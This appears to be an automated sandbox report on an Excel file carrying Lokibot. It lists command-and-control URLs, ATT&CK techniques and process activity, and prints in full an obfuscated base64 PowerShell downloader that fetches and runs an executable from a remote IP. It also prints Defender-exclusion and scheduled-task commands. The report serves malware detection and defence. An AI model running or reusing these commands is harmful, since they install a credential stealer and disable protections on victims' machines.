lokibot | f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d

Analysis

max time kernel
119s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
21-11-2024 08:55

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls
Size

1.1MB
MD5

5a69ac58c3133e24a783cf4ea670a243
SHA1

7fdf7feed6f105ce6bfeb34fb44c9c58dfe9057e
SHA256

f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
SHA512

5b338a97aacf226f9e4360eec8fa2149cb5a77836f357e76c276a799625f91ceb4c9b49c0ef13a9fc31a98770eb0088192ba0b05b2ec668beaa5cd71ccc30c04
SSDEEP

24576:auq9PLiijE2Z5Z2amwshXCdQtF84LJQohL7m90Ns4Ql1xzRjpCrHac:auEPLiij7Z5ZKwsAsFjLJQohm90Clvzu

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Family

lokibot

http://94.156.177.41/simple/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Blocklisted process makes network request 3 IoCs

Processes:

mshta.exepOweRShelL.EXe

flow pid process

12 2712 mshta.exe
13 2712 mshta.exe
15 2456 pOweRShelL.EXe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

960 powershell.exe
1652 powershell.exe
Downloads MZ/PE file
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

powershell.exepOweRShelL.EXe

pid process

2984 powershell.exe
2456 pOweRShelL.EXe
Executes dropped EXE 4 IoCs

Processes:

caspol.execaspol.execaspol.execaspol.exe

pid process

2964 caspol.exe
2536 caspol.exe
1856 caspol.exe
2568 caspol.exe
Loads dropped DLL 3 IoCs

Processes:

pOweRShelL.EXe

pid process

2456 pOweRShelL.EXe
2456 pOweRShelL.EXe
2456 pOweRShelL.EXe
Reads user/profile data of web browsers 3 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Credentials from Web Browsers
T1555.003

flow	pid	process
12	2712	mshta.exe
13	2712	mshta.exe
15	2456	pOweRShelL.EXe

pid	process
960	powershell.exe
1652	powershell.exe

pid	process
2984	powershell.exe
2456	pOweRShelL.EXe

pid	process
2964	caspol.exe
2536	caspol.exe
1856	caspol.exe
2568	caspol.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	caspol.exe
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

Drops file in System32 directory 4 IoCs

Processes:

pOweRShelL.EXepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	pOweRShelL.EXe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

Processes:

caspol.exe

description pid process target process

PID 2964 set thread context of 2568 2964 caspol.exe caspol.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

description	pid	process	target process
PID 2964 set thread context of 2568	2964	caspol.exe	caspol.exe

System Location Discovery: System Language Discovery 1 TTPs 10 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.exepowershell.exeschtasks.exeEXCEL.EXEpOweRShelL.EXecvtres.execaspol.exepowershell.exemshta.exepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	pOweRShelL.EXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	caspol.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Modifies Internet Explorer settings 1 TTPs 1 IoCs
adware spyware

Modify Registry
T1112

Processes:

mshta.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main mshta.exe
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence execution

Scheduled Task
T1053.005

Processes:

schtasks.exe

pid process

2056 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

2308 EXCEL.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

pid	process
2056	schtasks.exe

pid	process
2308	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 10 IoCs

Processes:

pOweRShelL.EXepowershell.execaspol.exepowershell.exepowershell.exe

pid	process
2456	pOweRShelL.EXe
2984	powershell.exe
2964	caspol.exe
960	powershell.exe
1652	powershell.exe
2964	caspol.exe
2964	caspol.exe
2964	caspol.exe
2964	caspol.exe
2964	caspol.exe

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

pOweRShelL.EXepowershell.execaspol.exepowershell.exepowershell.execaspol.exe

description	pid	process
Token: SeDebugPrivilege	2456	pOweRShelL.EXe
Token: SeDebugPrivilege	2984	powershell.exe
Token: SeDebugPrivilege	2964	caspol.exe
Token: SeDebugPrivilege	960	powershell.exe
Token: SeDebugPrivilege	1652	powershell.exe
Token: SeDebugPrivilege	2568	caspol.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXE

pid process

2308 EXCEL.EXE
2308 EXCEL.EXE
2308 EXCEL.EXE
2308 EXCEL.EXE
2308 EXCEL.EXE

pid	process
2308	EXCEL.EXE
2308	EXCEL.EXE
2308	EXCEL.EXE
2308	EXCEL.EXE
2308	EXCEL.EXE

Suspicious use of WriteProcessMemory 50 IoCs

Processes:

mshta.exepOweRShelL.EXecsc.execaspol.exe

description	pid	process	target process
PID 2712 wrote to memory of 2456	2712	mshta.exe	pOweRShelL.EXe
PID 2712 wrote to memory of 2456	2712	mshta.exe	pOweRShelL.EXe
PID 2712 wrote to memory of 2456	2712	mshta.exe	pOweRShelL.EXe
PID 2712 wrote to memory of 2456	2712	mshta.exe	pOweRShelL.EXe
PID 2456 wrote to memory of 2984	2456	pOweRShelL.EXe	powershell.exe
PID 2456 wrote to memory of 2984	2456	pOweRShelL.EXe	powershell.exe
PID 2456 wrote to memory of 2984	2456	pOweRShelL.EXe	powershell.exe
PID 2456 wrote to memory of 2984	2456	pOweRShelL.EXe	powershell.exe
PID 2456 wrote to memory of 2920	2456	pOweRShelL.EXe	csc.exe
PID 2456 wrote to memory of 2920	2456	pOweRShelL.EXe	csc.exe
PID 2456 wrote to memory of 2920	2456	pOweRShelL.EXe	csc.exe
PID 2456 wrote to memory of 2920	2456	pOweRShelL.EXe	csc.exe
PID 2920 wrote to memory of 1960	2920	csc.exe	cvtres.exe
PID 2920 wrote to memory of 1960	2920	csc.exe	cvtres.exe
PID 2920 wrote to memory of 1960	2920	csc.exe	cvtres.exe
PID 2920 wrote to memory of 1960	2920	csc.exe	cvtres.exe
PID 2456 wrote to memory of 2964	2456	pOweRShelL.EXe	caspol.exe
PID 2456 wrote to memory of 2964	2456	pOweRShelL.EXe	caspol.exe
PID 2456 wrote to memory of 2964	2456	pOweRShelL.EXe	caspol.exe
PID 2456 wrote to memory of 2964	2456	pOweRShelL.EXe	caspol.exe
PID 2964 wrote to memory of 960	2964	caspol.exe	powershell.exe
PID 2964 wrote to memory of 960	2964	caspol.exe	powershell.exe
PID 2964 wrote to memory of 960	2964	caspol.exe	powershell.exe
PID 2964 wrote to memory of 960	2964	caspol.exe	powershell.exe
PID 2964 wrote to memory of 1652	2964	caspol.exe	powershell.exe
PID 2964 wrote to memory of 1652	2964	caspol.exe	powershell.exe
PID 2964 wrote to memory of 1652	2964	caspol.exe	powershell.exe
PID 2964 wrote to memory of 1652	2964	caspol.exe	powershell.exe
PID 2964 wrote to memory of 2056	2964	caspol.exe	schtasks.exe
PID 2964 wrote to memory of 2056	2964	caspol.exe	schtasks.exe
PID 2964 wrote to memory of 2056	2964	caspol.exe	schtasks.exe
PID 2964 wrote to memory of 2056	2964	caspol.exe	schtasks.exe
PID 2964 wrote to memory of 1856	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 1856	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 1856	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 1856	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2536	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2536	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2536	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2536	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe
PID 2964 wrote to memory of 2568	2964	caspol.exe	caspol.exe

outlook_office_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	caspol.exe

outlook_win_path 1 IoCs

Processes:

caspol.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	caspol.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2308

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2712
- C:\Windows\SysWOW64\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe
  "C:\Windows\sYStem32\wInDOwSPOweRsheLl\v1.0\pOweRShelL.EXe" "PoWeRSheLL.ExE -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment ; iEx($(iEX('[SysteM.TExT.encODInG]'+[cHAR]58+[cHAR]58+'UTF8.GEtSTrINg([sysTem.cOnVERT]'+[cHAR]58+[chAr]58+'FrOMbASe64StrIng('+[chAR]34+'JG56dWNGVUF3ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFEZC10WVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1lbWJlUkRFRklOaVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWlBudFZzUmhBaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBNeWpwcUlrUXdEYixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB1alFRcFNYb0lXeSx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTSxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBhWXlwdmx5a3BlKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiZFhHTSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNRVNwYUNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgV1BmVyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkbnp1Y0ZVQXc6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yNDMuMTM2LzU1L2Nhc3BvbC5leGUiLCIkZU52OkFQUERBVEFcY2FzcG9sLmV4ZSIsMCwwKTtzVGFyVC1TbGVlUCgzKTtpZXggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXGNhc3BvbC5leGUi'+[cHaR]0X22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Loads dropped DLL
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2456
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX bYpAss -nOP -W 1 -c DeViCecReDenTIaldEpLOyment
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2984
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2920
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCFCE.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCCFCD.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:1960
- - C:\Users\Admin\AppData\Roaming\caspol.exe
    "C:\Users\Admin\AppData\Roaming\caspol.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2964
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:960
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\rrwscqkDSNwLK.exe"
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1652
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\rrwscqkDSNwLK" /XML "C:\Users\Admin\AppData\Local\Temp\tmp4192.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      Scheduled Task/Job: Scheduled Task
      PID:2056
  - - C:\Users\Admin\AppData\Roaming\caspol.exe
      "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Executes dropped EXE
      PID:1856
  - - C:\Users\Admin\AppData\Roaming\caspol.exe
      "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Executes dropped EXE
      PID:2536
  - - C:\Users\Admin\AppData\Roaming\caspol.exe
      "C:\Users\Admin\AppData\Roaming\caspol.exe"
      4⤵
      Executes dropped EXE
      Accesses Microsoft Outlook profiles
      Suspicious use of AdjustPrivilegeToken
      outlook_office_path
      outlook_win_path
      PID:2568

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Data from Local System

T1005

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

Filesize
717B

MD5
822467b728b7a66b081c91795373789a

SHA1
d8f2f02e1eef62485a9feffd59ce837511749865

SHA256
af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9

SHA512
bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1087EC93233409051A3831D3D6C361C8

Filesize
504B

MD5
0b60282e9ddea43ca313d63ec56740ad

SHA1
e7cc9ff054f23bdd36103a4e90cc9f7e8e8b214a

SHA256
358893a6900a0c0cc4d1457dbe7bcdef7e24b7c437d3623806f23827caac2c13

SHA512
ed83aaf8dd61a513ec6854b3ba948fcfd8d4ffcbefebe082330d320f0c234003ba0b290eada14f79836cffd792931eb19bd3539ab2801c9c00c244e228439024

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

Filesize
192B

MD5
8948537a3d8cf6472968eaaa4d737bc7

SHA1
be0804f1dba8f2821fbfeb6086ba99133977d6ab

SHA256
85acea3f10c6eda76af7cf92e6a51d962be38db9eef1c3050941e09a1251a576

SHA512
ceab54352af50b7678f937e2370ba7b94efdf30b0af8797257fedc929bab892f3aa66451ce52b3804e6fa27e29354c76168fda2a7c125996f97fd66f716897df

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8

Filesize
550B

MD5
07495b0fdb6a3d3885aec8db9ff33bf7

SHA1
d9b06e201bba1af286cc8ebcf4b146929faf439b

SHA256
3d7fbd0e467e9a23b2fa90f47a7a44fda0efb1caf9b4ae7573ca778104a50e62

SHA512
200f82d25f2774dfed3a83366bbe1837feb0a2a9faa0c703f0a2fd7206a4879a6e5793ed7128260086bd69717479ab638efab740b63d4f5cb6505dc9b8366122

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\DJB1KT77\greetingwithgreatthignsgivenbackwithentireprocessgivenmeback[1].hta

Filesize
8KB

MD5
50388b1f7dd763e374254a7cba6c8ec5

SHA1
6e6c486bc41a4bb1978c05585c01d2b8d9c60a5d

SHA256
7cc793038da07c244953d691f1206b00811817e1c623b582ef94276cecd6d77a

SHA512
0b2a143d563f62dd913de0ead3af93e27a9216758ae644d5dcf05d234d90771966ee27bc634c3749bf78a87d9656fa4f2b6e1547c4f260df08639136d11a8709

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabC6D8.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESCFCE.tmp

Filesize
1KB

MD5
2b5b10ec04cd67d8945424bb16587308

SHA1
10238eed463047bcf2c316383d6f72e3eca14485

SHA256
f291752643b331119ed38f135b55d443e89a830869f96af62eee78124ee742f4

SHA512
f06ab9a0afa20dea09ac2a2c2c223d157ec8e42c294c9352f95037da68a95ba434fbc1ee146bd6db640a5f8d5d2ac6410b2a16e0a7e236024f9ada938867c34b

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp4192.tmp

Filesize
1KB

MD5
e7f601e9f8dfa0e17e3a9e63ed32c661

SHA1
4f71185e0f401b03c985c6882a8d1afc36949ced

SHA256
45c41a8d88c697291c6d4051d4bf470a6754822a7340042737f005d3c3bcfd0e

SHA512
1d3f834da17afc1039a222a271fbaa725dffe175f7c91105c7c4b68ea9e2e3f0d399c20c0095cd17d3e37e265a84775d301e9779b0e06789ed70fc62d3537567

Download Submit
C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.dll

Filesize
3KB

MD5
ec937630adcf8977be40884de3ec18e8

SHA1
c9d6bea53470543a1d8a9ea3de43e3eb2560d1e4

SHA256
b8995b4ee5e11d4c99a12fea932b741d89f484fa65855209b61eee88281e061f

SHA512
c5286de86e12d788e3d14264f09008252f1235f35ad6641a5f9f74653b98517713b3e02f147883f2767733079ead772fc0cc6e6e536716c42e046476537dfc98

Download Submit
C:\Users\Admin\AppData\Local\Temp\zv9ghrdm.pdb

Filesize
7KB

MD5
840cd591a20f611a1157774bb56a2b85

SHA1
087e28cc8c1ab176bc0231a744d86efb4ed19216

SHA256
17d1272995fe68d400161189eb4c101b4a3939650561992505a6b1ae24da2fc1

SHA512
80d8b2a0d0cb0777f63ec442c664be272d81bd1c818331dfe72a4170a5d869e23d9856b4bce48e6e910fa3f74e42cdd15359d97c1b63bdf65f63779039fb9267

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3533259084-2542256011-65585152-1000\0f5007522459c86e95ffcc62f32308f1_38b42d9b-3e83-45f4-8789-a30be34574b0

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
a56ee2770383b51628d2d20ce179de0f

SHA1
288a2a7c48dfe0bac0a7388fce8122845cfb04f2

SHA256
8909f8abfd3b7b06136531eb3ca81f0a3377369d80e9597a94834c33ca154094

SHA512
e64a4cc3ab34c7c96ffdbdab63924b93c071f4491d1617e1fbbcd4117e63ffebe63d72254fa30b6af321b94c5e6b228d7b79d9207255962035c7258ecd96eb4a

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
d6d823d046675e6c32b4825035b0f4c6

SHA1
d815615054eb8a969449fae9019eec55aecdc1f5

SHA256
e5d81951dc9eba7cb82682e6d8a6855185a4a86f3d3eaed773d890a594d9573f

SHA512
fe401cc29e6c90e0320d74ec3e39adfe0e24a0f7a3b8f039171ec22849d69f2fb6abb55785aaf197f0a3947109559d638b61690acdf23c2e7ea1d42bcdc10232

Download Submit
C:\Users\Admin\AppData\Roaming\caspol.exe

Filesize
586KB

MD5
74061922f1e78c237a66d12a15a18181

SHA1
e31ee444aaa552a100f006e43f0810497a3b0387

SHA256
89bf888148eae2caabdc6d3fff98054127b197b402493581894a3104ed6b6f1c

SHA512
306744107d78b02ecfd28252dae954f0b47c1f761e15a33c937474a2e15284c17bb7e2542618b745ea5f95e5a7dba3d27b675c8837914a44d8b5b350a3d4a136

Download Submit
\??\PIPE\srvsvc

MD5
d41d8cd98f00b204e9800998ecf8427e

SHA1
da39a3ee5e6b4b0d3255bfef95601890afd80709

SHA256
e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

SHA512
cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCCFCD.tmp

Filesize
652B

MD5
a880c8b9bda21d20c8bf1b504fc8c17e

SHA1
49b3312c2b1047860334d71f596bc990fb7faeb4

SHA256
777f5f69471e7c6458b1bde2a47f64b3379d7c3ad2486c6fcd7cbf643eab0eb1

SHA512
227a3bf0235198e70ad25b2e1aadc8d8ca226487ad37ba9e7c99bdb7b34ca35877cba15d31c906c3203a1c4b8df85b4b3ad6b39bedbf57bebe47b4c1d21a2797

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zv9ghrdm.0.cs

Filesize
484B

MD5
fe82050659a8b97690d60529499222c1

SHA1
7cc50135852b46dd1e36f2ff98506613db525a68

SHA256
64c38563c4588b718b03aec685677f173456d3c961ef97cd95e7784ee1e51a6a

SHA512
59356fd5cbb38a06bf09e182b8ed7c7c2200e6f8de8e950be38bee0c45aa96b2dbf202bdc56097a74acc4e0a8bc601558e83c098a376630cfa1bcce64133d64f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\zv9ghrdm.cmdline

Filesize
309B

MD5
c57bc8cdba00b7c06f649f8240a63731

SHA1
520a60648b730f63e2e8b6d982997ed806cdf9b3

SHA256
71e67c9a0696553812be4348b4a3797116fd185d88d2189d2b68786204239900

SHA512
